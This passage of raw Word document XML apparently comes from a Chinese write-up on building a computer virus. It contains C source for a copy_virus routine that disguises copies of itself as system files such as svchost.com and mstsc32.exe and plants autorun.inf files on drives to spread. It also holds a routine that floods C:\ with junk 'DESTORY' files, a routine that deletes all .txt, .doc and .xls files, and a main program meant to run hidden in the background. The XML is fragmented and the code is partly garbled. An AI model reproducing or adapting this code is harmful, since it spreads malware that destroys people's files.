        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> copy_virus()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i, k;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="005032"/>
        </w:rPr>
        <w:t>FILE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> *input, *output;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> *files_svchost[SVCHOST_NUM]=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>"svchost.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\windows\\wjview32.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\windows\\system\\MSMOUSE.DLL"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\windows\\syste</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>m32\\cmdsys.sys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>","</w:t>
      </w:r>
      <w:r>
        <w:t>c:\\windows\\system32\\mstsc32.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>","</w:t>
      </w:r>
      <w:r>
        <w:t>c:\\windows\\explorer.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"};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 temp[2][20]=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>"c:\\svchost.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>"c:\\autorun.inf"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>};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i = 0; i &lt; SVCHOST_NUM; i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{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(input = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>fopen</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>files_svchost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[i], </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>rb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>)) != NULL)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  <w:t>{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</w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fclose</w:t>
      </w:r>
      <w:r>
        <w:t>(input);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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k = 0; k &lt; SVCHOST_NUM; k++)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  <w:t>{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</w:r>
      <w:r>
        <w:tab/>
        <w:t>copy(files_svchost[i], files_svchost[k]);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  <w:t>}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  <w:t>i = SVCHOST_NUM;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  <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}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i = 0; i &lt; SVCHOST_NUM; i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{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(input = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>fopen</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>files_svchost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[i], </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>rb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>)) != NULL)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  <w:t>{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</w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fclose</w:t>
      </w:r>
      <w:r>
        <w:t>(input);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k = 0; k &lt; 24; k++)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  <w:t>{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</w:r>
      <w:r>
        <w:tab/>
        <w:t>copy(files_svchost[i], temp[0]);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(output = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>fopen</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>temp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[1], </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"w"</w:t>
      </w:r>
      <w:r>
        <w:t>)) != NULL)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642880"/>
        </w:rPr>
        <w:t>fprintf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(output, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"%s"</w:t>
      </w:r>
      <w:r>
        <w:t>, autorun);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642880"/>
        </w:rPr>
        <w:t>fclose</w:t>
      </w:r>
      <w:r>
        <w:t>(output);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr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temp</w:t>
      </w:r>
      <w:r>
        <w:t>[0][0]++;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temp</w:t>
      </w:r>
      <w:r>
        <w:t>[1][0]++;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  <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>i = SVCHOST_NUM;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00AB32B7">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB32B7" w:rsidRDefault="00AB32B7" w:rsidP="00C625D0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:sectPr w:rsidR="00AB32B7" w:rsidSect="00C04F9C">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="991" w:bottom="1440" w:left="993" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:num="2" w:sep="1" w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="00B05E77" w:rsidP="00C625D0">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2.7</w:t>
      </w:r>
      <w:r w:rsidR="00C625D0">
        <w:t>制造垃圾文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>函数：制造垃圾文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>void make_rubbish()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>int i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>FILE *output;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>srand(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for (i = 0; i &lt; RUBBISH_NUM; i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>int n;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>char s[30];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>n = rand();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>sprintf(s, "C:\\DESTORY_</w:t>
      </w:r>
      <w:r>
        <w:t>感染</w:t>
      </w:r>
      <w:r>
        <w:t>_%d", n);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ((output = fopen(s, "w")) != NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fprintf(output, "%ld%s", n * n, s);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fclose(output);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472103" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="00472103" w:rsidP="00472103">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1766" w:rsidRDefault="00B05E77" w:rsidP="002E787A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2.8</w:t>
      </w:r>
      <w:r w:rsidR="004C1766">
        <w:t>删除文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:sectPr w:rsidR="00A94676" w:rsidSect="00C04F9C">
          <w:type w:val="continuous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:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>函数：删除文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>void remove_files()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>long done;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>int i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>struct _finddata_t ffblk;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>char *remove_files[3] =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>{ "*.txt", "*.doc", "*.xls" };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for (i = 0; i &lt; 3; i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if (_findfirst(remove_files[i], &amp;ffblk) == -1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>continue;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>while (!done)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>remove(ffblk.name);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>_findnext(done, &amp;ffblk);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>_findclose(done);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="002E787A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:sectPr w:rsidR="00A94676" w:rsidSect="00C04F9C">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="991" w:bottom="1440" w:left="993" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:num="2" w:sep="1" w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="00B05E77" w:rsidP="002E787A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2.9</w:t>
      </w:r>
      <w:r w:rsidR="002E787A">
        <w:t>主程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>主程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>DEV-CPP 32</w:t>
      </w:r>
      <w:r>
        <w:t>位</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>工程</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:t>.C</w:t>
      </w:r>
      <w:r>
        <w:t>程序脱离命令行界面，于后台执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>int main(int argc, char **argv)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>int contral = 0;</w:t>
      </w:r>
    </w:p>
